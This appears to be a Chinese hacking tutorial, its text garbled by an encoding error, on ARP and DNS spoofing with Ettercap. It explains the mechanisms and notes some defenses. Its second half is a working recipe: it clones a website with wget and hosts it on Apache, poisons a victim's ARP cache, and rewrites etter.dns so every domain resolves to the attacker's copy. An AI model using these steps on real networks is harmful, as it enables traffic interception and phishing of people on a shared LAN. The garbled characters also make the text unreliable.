本教程僅供學(xué)習(xí)使用,不得用于非法途徑,我概不負(fù)責(zé)?。。。。。?/p> 一年前玩過ettercap做arp欺騙和dns欺騙的實(shí)驗(yàn),都忘記怎么操作的了,哈哈,現(xiàn)在重新整理下資料,方便小伙伴學(xué)習(xí)。
Ettercap:剛開始只是作為一個(gè)網(wǎng)絡(luò)嗅探器,但在開發(fā)過程中,它獲得了越來越多的功能,在中間的攻擊人方面,是一個(gè)強(qiáng)大而又靈活的工具。它支持很多種協(xié)議(即使是加密的),包括網(wǎng)絡(luò)和主機(jī)產(chǎn)品特征分析,還有dns欺騙等等。 wget : 非常強(qiáng)大的站點(diǎn)拷貝工具和httrack類似,linux一般都自帶wget,說白了我就是用它克隆別人的網(wǎng)站,把別人網(wǎng)站源代碼和網(wǎng)站的文件拷貝下來自己用,其他功能自行科普。 HTTrack:是一個(gè)免費(fèi)并易于使用的線下瀏覽器工具,它能夠讓你從互聯(lián)網(wǎng)上下載整個(gè)網(wǎng)站進(jìn)行線下瀏覽。瀏覽線下站點(diǎn)和線上并沒有什么不同。HTTrack同樣可以進(jìn)行線下線上站點(diǎn)同步,支持?jǐn)帱c(diǎn)續(xù)傳。HTTrack是一個(gè)可全面配置并包括全面的幫助系統(tǒng)的工具。 nmap :一是探測(cè)一組主機(jī)是否在線;其次是掃描 主機(jī)端口,嗅探所提供的網(wǎng)絡(luò)服務(wù);還可以推斷主機(jī)所用的操作系統(tǒng) 。如果只是探測(cè)存活主機(jī),用個(gè)shell腳本就可以實(shí)現(xiàn),點(diǎn)擊 我的shell腳本。
arp欺騙: arp欺騙講解:B(192.168.1.10)主機(jī)發(fā)送數(shù)據(jù)到哪里都是根據(jù)本機(jī)arp表和路由表判定的,比如向局域網(wǎng)內(nèi)或局域網(wǎng)外發(fā)送數(shù)據(jù),都會(huì)通過自己的默認(rèn)網(wǎng)關(guān)轉(zhuǎn)發(fā)數(shù)據(jù),本地arp表會(huì)不定時(shí)的刷新ip--mac關(guān)系,在本地arp表沒有網(wǎng)關(guān)192.168.1.1的mac信息時(shí),會(huì)發(fā)送廣播問誰的ip地址是192.168.1.1,這個(gè)時(shí)候局域網(wǎng)所有主機(jī)都會(huì)收到這條信息,正常情況下應(yīng)該是192.168.1.1將mac地址回應(yīng)給主機(jī)B刷新arp表,但是這時(shí)候主機(jī)A(192.168.1.5)回應(yīng)說自己就是192.168.1.1,并將mac返回給主機(jī)B刷新B的arp表,主機(jī)B的arp里對(duì)應(yīng)信息為這樣 192.168.1.1-------主機(jī)B(192.168.1.5)的mac,得到了網(wǎng)關(guān)的mac后就開始傳輸真正的數(shù)據(jù)了,數(shù)據(jù)包封裝上 源(主機(jī)B)mac 目的為網(wǎng)關(guān)mac(實(shí)際是主機(jī)A的mac), 交換機(jī)是這樣轉(zhuǎn)發(fā):交換機(jī)有個(gè)CAM表,存放交換機(jī)物理端口和mac對(duì)應(yīng)關(guān)系,拆解數(shù)據(jù)包,看該數(shù)據(jù)包的目的mac是誰,然后根據(jù)cam表轉(zhuǎn)發(fā)到對(duì)應(yīng)的端口,由于封裝的目的mac是主機(jī)A的mac,所以本來發(fā)給網(wǎng)關(guān)的數(shù)據(jù),現(xiàn)在發(fā)給了主機(jī)A,這就是一個(gè)欺騙。主機(jī)A不僅僅欺騙主機(jī)A,它還會(huì)欺騙網(wǎng)關(guān),說自己就是主機(jī)B。 簡(jiǎn)單原理: 主機(jī)A說自己是網(wǎng)關(guān),騙將發(fā)給網(wǎng)關(guān)的數(shù)據(jù)發(fā)給主機(jī)A,然后由主機(jī)A發(fā)送給真正的網(wǎng)關(guān)。 主機(jī)A告訴網(wǎng)關(guān)它就是主機(jī)B,騙將發(fā)給B的數(shù)據(jù)發(fā)給主機(jī)A,然后由A轉(zhuǎn)發(fā)給主機(jī)B。 如何防止arp欺騙: 劃分vlan和綁定靜態(tài)的arp表,靜態(tài)arp表有個(gè)弊端就是,如果你綁定的那臺(tái)舊主機(jī)拆走了,接進(jìn)來另外一臺(tái)新主機(jī),而你的arp表存的舊主機(jī)的mac,這樣數(shù)據(jù)包就轉(zhuǎn)發(fā)不出去了,很坑吧,哈哈。
DNS欺騙:其實(shí)DNS欺騙不能叫欺騙,為什么這么說,因?yàn)閐ns解析采取就近原則,意思是說誰能先幫我解析我就聽誰的。給你解析一個(gè)假的ip就是欺騙。例如本來www.baidu.com 對(duì)應(yīng)ip是202.16.25.78 ,你在本地架設(shè)一個(gè)dns服務(wù)器將www.baidu.com 解析為192.168.100.2 , 這不就等于騙了別人嗎。 dns解析過程是這樣的:先通過本機(jī)的host文件解析,如果不能解析,就讓最近的dns服務(wù)器解析 。其實(shí)dns解析還分為遞歸解析和迭代解析。這里不解釋。 如何防止dns欺騙: 直接修改自己的host文件,將你訪問的域名和ip地址直接寫到里面,這樣就不用通過dns服務(wù)器了,也就無法被騙 。 實(shí)驗(yàn)干貨前提: 你和你要欺騙的主機(jī)在同一局域網(wǎng)。 你所在局域網(wǎng)沒有被劃分vlan。 1、搭建環(huán)境 如果你是虛擬機(jī)想測(cè)試主機(jī)所在局域網(wǎng)如下選擇(VMwar)
設(shè)置kali的網(wǎng)卡模式為dhcp
2、wget克隆網(wǎng)站 命令格式:wget -d -r -c url地址
下載完后會(huì)在當(dāng)前目錄下創(chuàng)建和url同名的文件夾 3、將網(wǎng)站源文件放到httpd的默認(rèn)文件夾下 /var/www/
注意:一定要將index.html 的那層目錄存在/var/www/下
4、開始arp欺騙 命令格式: ettercap -Tq -i 網(wǎng)卡 -M arp:remote /要欺騙的ip// /網(wǎng)關(guān)ip// 提示:有線網(wǎng)卡一般為eth0,如果你掛載了外接的無限網(wǎng)卡一般為wlan0 欺騙的主機(jī)是192.168.43.10 ,網(wǎng)關(guān)是192.168.43.1
5、重要一步:修改 vim /etc/ettercap/etter.dns 追加格式例如 : www.baidu.com A 192.168.43.133(寫本機(jī)的ip) ##將www.baidu.com 解析到本機(jī) *.*.* A 192.168.43.133 ##將所有域名解析到本機(jī)
命令格式: ettercap -Tq -i eth0 -M arp:remote -P dns_spoof /要欺騙的ip// /網(wǎng)關(guān)的ip//
7、開啟Apache服務(wù) 命令: service apache2 start
8、檢驗(yàn)成果 讓被欺騙的那個(gè)主機(jī)瀏覽器任意輸入一個(gè)域名,會(huì)發(fā)現(xiàn)顯示的都是你的網(wǎng)站界面。
表演到此結(jié)束。
|
|